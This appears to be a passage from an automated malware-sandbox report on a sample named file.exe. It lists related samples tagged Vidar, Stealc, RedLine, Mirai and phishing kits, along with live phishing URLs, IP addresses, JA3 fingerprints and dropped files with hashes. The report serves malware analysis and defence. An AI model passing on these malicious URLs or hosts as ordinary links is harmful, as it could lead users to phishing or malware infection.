	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	93.184.215.14
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	93.184.215.14
ww55.affinity.net	file.exe	Get hash	malicious	Unknown	Browse	34.160.134.7
ww55.affinity.net	file.exe	Get hash	malicious	Unknown	Browse	34.160.134.7
market-trk.com	file.exe	Get hash	malicious	Unknown	Browse	104.18.12.104
services.addons.mozilla.org	file.exe	Get hash	malicious	Babadeda	Browse	18.65.39.112
	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	3.165.136.19
	file.exe	Get hash	malicious	Babadeda	Browse	18.65.39.112
	file.exe	Get hash	malicious	Babadeda	Browse	143.204.215.18
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	18.65.39.85
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	143.204.215.18
	file.exe	Get hash	malicious	Babadeda	Browse	143.204.215.122
	file.exe	Get hash	malicious	Babadeda	Browse	143.204.215.105
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	143.204.215.18
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	143.204.215.115

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	https://intralinks.us.com/jallessI1Ae2APharrI1AsassoTxcz01coTxm	Get hash	malicious	HTMLPhisher	Browse	172.67.159.233
	https://mrlocksmithpenticton.com/mlc/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://new-sneww-online-nowz-all.azurewebsites.net/?referrer=appmetrica_tracking_id%3D173005530304969909%26ym_tracking_id%3D10094745761516744100	Get hash	malicious	Unknown	Browse	104.18.36.155
	https://portal.avel-erx.com/esync/app/?token=4276f42c-09fa-4876-aa17-00d2659d77a4	Get hash	malicious	Unknown	Browse	1.1.1.1
	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.213.85
	https://www.canva.com/design/DAGMEHwBhBU/KuqkCNaGGLCBR8SypHXNgw/edit?utm_content=DAGMEHwBhBU&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	Unknown	Browse	188.114.96.3
	Final Shipping Document.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	https://forms.office.com/r/qq9c20HBqa	Get hash	malicious	Tycoon2FA	Browse	104.17.25.14
	https://123formbuilder.info/wj412l/#9ryano@vib.tech	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
AMAZON-02US	https://new-sneww-online-nowz-all.azurewebsites.net/?referrer=appmetrica_tracking_id%3D173005530304969909%26ym_tracking_id%3D10094745761516744100	Get hash	malicious	Unknown	Browse	52.46.151.131
	https://www.canva.com/design/DAGMEHwBhBU/KuqkCNaGGLCBR8SypHXNgw/edit?utm_content=DAGMEHwBhBU&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	Unknown	Browse	75.2.57.54
	https://forms.office.com/r/qq9c20HBqa	Get hash	malicious	Tycoon2FA	Browse	108.156.39.22
	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	3.165.136.19
	93g0DCqh1e.elf	Get hash	malicious	Mirai	Browse	52.60.154.184
	https://forms.office.com/e/4PVhav2XCG	Get hash	malicious	Unknown	Browse	52.217.198.229
	AKPSrAWl2G.elf	Get hash	malicious	Mirai	Browse	157.175.218.232
	TRn7934M3A.elf	Get hash	malicious	Mirai	Browse	18.167.100.66
	rLog7rmU2e.elf	Get hash	malicious	Mirai	Browse	13.237.69.138
	5oXS6HtbzC.elf	Get hash	malicious	Mirai	Browse	13.223.33.112
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	Babadeda	Browse	204.79.197.237
	https://1drv.ms/b/c/0524e941baea8759/EbTQ6AvSTkdPuFAldWpGokYBh0MxWHPfUcZj1H5z_yZ5Ew?e=cIicc7	Get hash	malicious	Unknown	Browse	13.107.137.11
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	20.75.60.91
	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	20.75.60.91
	https://alamanaschool-my.sharepoint.com/:o:/g/personal/faridhajahan_kg_amanaschool_com/EjJ3Pc0GI4lCgL5xS_fmQD0Bn9XR0VtN5_yNafsBQyYJsg?e=OHPWmQ	Get hash	malicious	Unknown	Browse	52.108.9.12
	file.exe	Get hash	malicious	Babadeda	Browse	23.96.180.189
	FW_ Data Sync Completed Successfully - #BWYEIQF_.eml	Get hash	malicious	Unknown	Browse	52.109.76.240
	AKPSrAWl2G.elf	Get hash	malicious	Mirai	Browse	40.70.116.231
	TRn7934M3A.elf	Get hash	malicious	Mirai	Browse	52.165.41.83
	rLog7rmU2e.elf	Get hash	malicious	Mirai	Browse	13.88.34.84
GES-ASRU	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	85.28.47.31
	joom.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31
	CqFFuklrhj.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	85.28.47.31
	Jzu7V2qdJx.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	file.exe	Get hash	malicious	Python Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, Vidar	Browse	85.28.47.31
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	85.28.47.70
	azeyNF3kkf.exe	Get hash	malicious	Stealc, Vidar	Browse	85.28.47.70

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Babadeda	Browse	184.28.90.27 40.126.32.136 52.165.165.26
	https://intralinks.us.com/jallessI1Ae2APharrI1AsassoTxcz01coTxm	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 40.126.32.136 52.165.165.26
	https://mrlocksmithpenticton.com/mlc/	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 40.126.32.136 52.165.165.26
	https://new-sneww-online-nowz-all.azurewebsites.net/?referrer=appmetrica_tracking_id%3D173005530304969909%26ym_tracking_id%3D10094745761516744100	Get hash	malicious	Unknown	Browse	184.28.90.27 40.126.32.136 52.165.165.26
	https://1drv.ms/b/c/0524e941baea8759/EbTQ6AvSTkdPuFAldWpGokYBh0MxWHPfUcZj1H5z_yZ5Ew?e=cIicc7	Get hash	malicious	Unknown	Browse	184.28.90.27 40.126.32.136 52.165.165.26
	https://www.canva.com/design/DAGMEHwBhBU/KuqkCNaGGLCBR8SypHXNgw/edit?utm_content=DAGMEHwBhBU&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	Unknown	Browse	184.28.90.27 40.126.32.136 52.165.165.26
	https://forms.office.com/r/qq9c20HBqa	Get hash	malicious	Tycoon2FA	Browse	184.28.90.27 40.126.32.136 52.165.165.26
	https://123formbuilder.info/wj412l/#9ryano@vib.tech	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 40.126.32.136 52.165.165.26
	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	184.28.90.27 40.126.32.136 52.165.165.26
	https://storage.googleapis.com/3ee33d379fb68c2e6e88/3633420a894acb1dc7559f656#cl/0_smt/10/3617893/3293/0/0	Get hash	malicious	Phisher	Browse	184.28.90.27 40.126.32.136 52.165.165.26
fb0aa01abe9d8e4037eb3473ca6e2dca	file.exe	Get hash	malicious	Babadeda	Browse	35.244.181.201 18.65.39.112 34.117.121.53 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	35.244.181.201 18.65.39.112 34.117.121.53 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Babadeda	Browse	35.244.181.201 18.65.39.112 34.117.121.53 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Babadeda	Browse	35.244.181.201 18.65.39.112 34.117.121.53 34.149.100.209 34.160.144.191 34.120.208.123
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	35.244.181.201 18.65.39.112 34.117.121.53 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	35.244.181.201 18.65.39.112 34.117.121.53 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Babadeda	Browse	35.244.181.201 18.65.39.112 34.117.121.53 34.149.100.209 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Babadeda	Browse	35.244.181.201 18.65.39.112 34.117.121.53 34.149.100.209 34.160.144.191 34.120.208.123
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	35.244.181.201 18.65.39.112 34.117.121.53 34.149.100.209 34.160.144.191 34.120.208.123
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	35.244.181.201 18.65.39.112 34.117.121.53 34.149.100.209 34.160.144.191 34.120.208.123

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Vidar	Browse
	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Vidar	Browse
	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse

Created / dropped Files

C:\ProgramData\AKECBFBAEBKJJJJKFCGCBKKEHD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BGIJDGCA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBGCAFIIECBFIDHIJKFBAKEGDG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFHIIEHJKKECGCBFIIJD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\CFIIIJJKJKFHIDGDBAKJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAAFBAKECAEGCBFIEGDGIEGIEH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJJEHJJKJEGHJJKEBFBGCBKEHI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDHDGDHJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IEHCBAFIDAECBGCBFHJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_48f0ec6733.exe_e95d1e3d9a7cd1add45d4b74dcaef3dd1ba61b19_38b4e776_114550e8-f51c-4653-b5f0-423b2488f5cf\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9704575695235137
Encrypted:	false
SSDEEP:	192:ouwnT0gf0pQ1UjEhZrMZtzuiF7Z24IO8P:EnT0gMpQ1UjbTzuiF7Y4IO8P
MD5:	7E0BDF265785117CC8649F778ED91D69
SHA1:	0CF71BF1578DBCCFD7A8E33C194317C81F33D95D
SHA-256:	2D262FEC24EB7503A6069B192E19CBFDEB9E356C2F0EC0C96ABD2B6B9E75AFC1
SHA-512:	32CDC7004D1776685563B59F2F019909D908F5E5E173072AF75E4A402B31F4357E84D54F222378354ED53C17EB631E8F309A6A71F4DFF2DC14AD968E49BD6242
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.9.1.0.0.8.0.7.7.2.7.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.9.1.0.0.8.5.1.5.5.6.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.4.5.5.0.e.8.-.f.5.1.c.-.4.6.5.3.-.b.5.f.0.-.4.2.3.b.2.4.8.8.f.5.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.e.2.b.d.2.6.-.4.a.a.f.-.4.f.6.a.-.9.6.7.f.-.6.b.0.b.8.c.5.d.d.b.0.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.8.f.0.e.c.6.7.3.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.4.8.-.0.0.0.1.-.0.0.1.4.-.1.a.e.7.-.a.1.0.a.8.7.d.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.2.3.4.b.a.5.d.f.d.0.9.5.e.f.e.9.b.3.c.b.4.0.f.c.9.e.c.3.9.1.4.0.0.0.0.f.f.f.f.!.0.0.0.0.9.3.4.c.d.4.3.f.f.8.b.d.3.5.e.7.7.d.7.d.f.2.c.b.c.3.a.a.5.d.9.6.b.6.7.2.e.4.b.f.!.4.8.f.0.e.c.6.7.3.3...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_f4d5066564a8bace5e01e26b05097e8e2375936_864df792_4c0cc867-023f-4594-8a88-ae0828f740aa\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1151633476015699
Encrypted:	false
SSDEEP:	192:Gh+znhvGPlTtf0UEJuEE3jEhZrMZ2V85zuiF7Z24IO8ThB:sKGN5MUEJuXjb0QzuiF7Y4IO8r
MD5:	FAE3EE039714E0DC45C490272F785218
SHA1:	AACAD896C2B23FAB2CDDB1175129E28226E73009
SHA-256:	D780C14F29FABE3DDA8ABB5DA4FE3A81D71330041BE64458B7FC5C7D288BB55F
SHA-512:	1DCDB301A14C606AAE87348AFC0CB4EC184928756C3F8C6CD6A59AF8A430937749BDDEA05478EE5314185F76D5AB54ED36450617FC14FF3798F2B96BAA09EF79
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.9.0.9.6.3.1.3.2.1.3.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.9.0.9.6.4.4.9.1.5.0.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.0.c.c.8.6.7.-.0.2.3.f.-.4.5.9.4.-.8.a.8.8.-.a.e.0.8.2.8.f.7.4.0.a.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.4.8.9.d.d.0.-.0.b.5.a.-.4.3.7.f.-.a.f.4.4.-.9.3.0.9.1.3.2.4.2.4.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.6.c.-.0.0.0.1.-.0.0.1.4.-.2.5.b.a.-.1.7.e.2.8.6.d.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.9.3.4.c.d.4.3.f.f.8.b.d.3.5.e.7.7.d.7.d.f.2.c.b.c.3.a.a.5.d.9.6.b.6.7.2.e.4.b.f.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D80.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Jul 26 18:10:08 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	63688
Entropy (8bit):	1.929417178036122
Encrypted:	false
SSDEEP:	384:4ZcdJm+VkENu7kyEmy0Dpf2NzD5ySukvP:ldJ5VkENXvvNz14IP
MD5:	43954CBCADC721EBAFB3EF96F1586231
SHA1:	6818D5BA4ED3880C1BA4863389451A3BCD04E509
SHA-256:	FB6F2781A198863D29B919C117B35F29246AA6A8B30ADBA4DF75D8719DB4B323
SHA-512:	EEDFB728BDA265254CE0DEBD7D42C14EE6ED150E461E118501E9C75348B2164100507888F2C1084A18BAFC5774AFC6F9EB409611642B58B034CEAFFB3B01C35A
Malicious:	false
Preview:	MDMP..a..... .........f............4...............<............*..........T.......8...........T............3..........................................................................................................eJ......H.......GenuineIntel............T.......H...}.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E1D.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8324
Entropy (8bit):	3.695569291980865
Encrypted:	false
SSDEEP:	192:R6l7wVeJYV6ap26Yql6QNkCgmfBrpDa89bVEsfZnm:R6lXJa6ap26YY6QNkCgmfBNV3fU
MD5:	1025018AB2A95AA53B0DE82B0B1EB67E
SHA1:	27C2F8C5957A42C370CF5559F569A53E485FC7E5
SHA-256:	6595FEFA031248296C3512707569EBE489AB26A7638FFEA9C8E41026462FE3F2
